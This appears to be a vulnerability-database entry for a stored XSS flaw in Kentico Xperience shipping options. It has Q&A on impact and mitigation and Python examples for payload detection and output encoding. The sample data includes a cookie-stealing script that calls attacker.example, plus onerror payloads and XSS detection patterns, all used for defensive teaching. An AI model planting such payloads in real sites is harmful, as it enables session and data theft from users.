CVE-2024-58322
BaseFortify

Publication date: 2025-12-18

Last updated on: 2025-12-27

Assigner: VulnCheck

Description
A stored cross-site scripting vulnerability in Kentico Xperience allows attackers to inject malicious code into shipping options configuration. This could lead to potential theft of sensitive data by executing malicious scripts in users' browsers.
Meta Information
Generated: 2026-05-07
AI Q&A generated: 2025-12-18
EPSS evaluated: 2026-05-05
Affected Vendors & Products
1 associated CPE
Vendor: kentico
Product: xperience
Version range: up to and including 13.0.158
CWE
CWE-79: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2024-58322 is a stored cross-site scripting (XSS) vulnerability in Kentico Xperience up to and including version 13.0.158. The application does not properly neutralize user-controllable input in the shipping options configuration, so an attacker who can edit that configuration can store script in it. Because the payload is persisted, it executes in the browser of every user who later views the affected shipping options, potentially compromising their session and data. [1]


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability could lead to the theft of sensitive data by executing malicious scripts in users' browsers. If that data includes personal or health information, the exposure may affect compliance with data protection regulations such as GDPR and HIPAA. The provided resources do not detail specific compliance implications. [1]


How can this vulnerability impact me?

This vulnerability can lead to the theft of sensitive data by executing malicious scripts in users' browsers. An attacker can use the stored script to steal cookies, session tokens, or other data the victim's browser can reach, or to perform actions in the victim's session, potentially leading to unauthorized access or data breaches. The CVSS rating cited in [1] is medium, with low impact on confidentiality, integrity, and availability, and user interaction is required for exploitation. [1]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Detection has two parts. First, confirm whether your Kentico Xperience installation is in the affected range (up to and including 13.0.158); if it is, treat the shipping options configuration as exposed. Second, because this is a stored XSS issue, inspect the stored shipping options data itself for injected payloads: script tags, event-handler attributes such as onerror=, javascript: URIs, and HTML-entity-encoded variants of these. The resources provide no specific commands; export the shipping options records or review them in the administration interface, or run a web application scanner against the affected pages. Monitoring HTTP requests to the shipping options pages for script-like payloads may also surface exploitation attempts, but a clean log does not prove that the stored data is clean. [1]
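As an added example (not code from BaseFortify, Kentico, or the advisory), the following Python script performs the two checks described above: it compares an installed version against the last affected release, 13.0.158, and triages exported shipping option records for script payloads, including entity-encoded ones. The export format and the column names ShippingOptionDisplayName and ShippingOptionDescription are assumptions modelled on Kentico's COM_ShippingOption table; the sample rows are constructed.

```python
import html
import re

# Last affected release per the CPE range on this page ("to 13.0.158 (inc)").
LAST_AFFECTED = (13, 0, 158)

# Triage heuristics for stored XSS payloads. Deliberately broad: every hit
# needs a human look, and an empty result is not proof of absence.
XSS_PATTERNS = [
    ("script-tag", re.compile(r"<\s*script\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("active-element", re.compile(r"<\s*(iframe|svg|object|embed|math)\b", re.I)),
    ("html-data-uri", re.compile(r"data\s*:\s*text/html", re.I)),
]

# Columns to inspect. Assumption: names modelled on Kentico's
# COM_ShippingOption table; adjust to whatever your export contains.
TEXT_FIELDS = ("ShippingOptionDisplayName", "ShippingOptionDescription")

# Constructed sample export (not real data). Row 2 carries a cookie
# exfiltration payload, row 3 an event handler, row 4 an entity-encoded
# script tag that only matters if something decodes it before output.
SAMPLE_ROWS = [
    {"ShippingOptionID": 1, "ShippingOptionDisplayName": "Standard delivery",
     "ShippingOptionDescription": "3-5 business days"},
    {"ShippingOptionID": 2,
     "ShippingOptionDisplayName": "Express<script>fetch('https://attacker.example/?c='+document.cookie)</script>",
     "ShippingOptionDescription": "Next business day"},
    {"ShippingOptionID": 3, "ShippingOptionDisplayName": "Store pickup",
     "ShippingOptionDescription": '<img src=x onerror="alert(document.domain)">'},
    {"ShippingOptionID": 4, "ShippingOptionDisplayName": "Courier",
     "ShippingOptionDescription": "&lt;script&gt;alert(1)&lt;/script&gt;"},
]


def parse_version(version: str) -> tuple[int, ...]:
    """Turn '13.0.158' into (13, 0, 158) so versions compare as tuples."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_version(version: str) -> bool:
    """True if the installed version falls inside the affected range."""
    return parse_version(version) <= LAST_AFFECTED


def find_payload_indicators(value: str) -> list[str]:
    """Names of heuristics matching the text as stored and, if it differs,
    after HTML entity decoding (reported with a 'decoded:' prefix)."""
    hits = []
    variants = [("raw", value)]
    decoded = html.unescape(value)
    if decoded != value:
        variants.append(("decoded", decoded))
    for label, text in variants:
        for name, pattern in XSS_PATTERNS:
            if pattern.search(text):
                hits.append(f"{label}:{name}")
    return hits


def scan_rows(rows: list[dict]) -> dict[int, list[str]]:
    """Map ShippingOptionID -> findings for every row with at least one hit."""
    findings = {}
    for row in rows:
        row_hits = []
        for field in TEXT_FIELDS:
            for hit in find_payload_indicators(str(row.get(field, ""))):
                row_hits.append(f"{field} {hit}")
        if row_hits:
            findings[row["ShippingOptionID"]] = row_hits
    return findings


if __name__ == "__main__":
    for v in ("13.0.158", "13.0.159"):
        print(v, "vulnerable" if is_vulnerable_version(v) else "not in affected range")
    for option_id, hits in scan_rows(SAMPLE_ROWS).items():
        print(f"ShippingOptionID {option_id}: {', '.join(hits)}")
```

Run it against a real export by replacing SAMPLE_ROWS with the rows from your database or CSV; the decoded variant is reported separately so that an entity-encoded payload, which may be harmless on output, can be triaged at lower priority than a raw one.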


What immediate steps should I take to mitigate this vulnerability?

Apply the hotfix published by Kentico DevNet for this stored XSS issue. Until it is applied, restrict the ability to edit shipping options to trusted users, since an attacker needs write access to that configuration to plant a payload. Because the payload is stored, victims only need to view the affected shipping options, so advising users to avoid suspicious links has limited value here; the controls that matter are patching, least privilege on the configuration, and output encoding of the stored values wherever they are rendered, with input validation as a second layer. After patching, review the existing shipping options data as well, since a fix to how values are handled does not by itself remove a payload that is already stored. Monitoring and logging changes to the affected configuration helps detect exploitation attempts and attribute an injection to an account. [1]
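To make the "input validation and output encoding" advice concrete, here is an added example in Python (not code from Kentico or the advisory; Kentico Xperience itself is .NET, and the same two layers apply there). It contrasts the unsafe string concatenation that CWE-79 describes with a version that encodes for the HTML context at the point of output, and adds an allowlist check for the short display-name field. The field names, the allowlist, and the payload are assumptions constructed for the example.

```python
import html
import re

# Assumption: a shipping option display name is a short human-readable label,
# so a strict allowlist is acceptable for it. Free-text fields such as a
# description cannot be validated this tightly, which is why output encoding
# is the control that has to hold regardless of what was stored.
DISPLAY_NAME_RE = re.compile(r"[A-Za-z0-9 .,&()'/+-]{1,100}")


def is_valid_display_name(value: str) -> bool:
    """Allowlist check: letters, digits, spaces and a few punctuation marks."""
    return DISPLAY_NAME_RE.fullmatch(value) is not None


def validate_display_name(value: str) -> str:
    """Reject a display name that fails the allowlist (raises ValueError)."""
    if not is_valid_display_name(value):
        raise ValueError("shipping option display name contains disallowed characters")
    return value


def render_option_row_unsafe(name: str, description: str) -> str:
    """The CWE-79 pattern: stored text concatenated straight into markup.
    Kept here only to show what the safe version changes."""
    return f"<tr><td>{name}</td><td>{description}</td></tr>"


def render_option_row(name: str, description: str) -> str:
    """Encode for the HTML text-node context at the point of output.
    quote=True also escapes ' and ", so the helper stays safe if it is
    reused inside a quoted attribute."""
    return (
        f"<tr><td>{html.escape(name, quote=True)}</td>"
        f"<td>{html.escape(description, quote=True)}</td></tr>"
    )


# Constructed payload in the style of the advisory's scenario (not a real one).
PAYLOAD = '<img src=x onerror="alert(document.domain)">'

if __name__ == "__main__":
    print("valid name accepted:", is_valid_display_name("Express (next day)"))
    print("payload as name rejected:", not is_valid_display_name(PAYLOAD))
    print("unsafe:", render_option_row_unsafe("Express", PAYLOAD))
    print("safe:  ", render_option_row("Express", PAYLOAD))
```

The allowlist stops the payload at the display-name field, but the description field has to accept free text, so only the encoding in render_option_row neutralizes it there; that is the layer the hotfix has to provide, and the layer to verify after patching.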

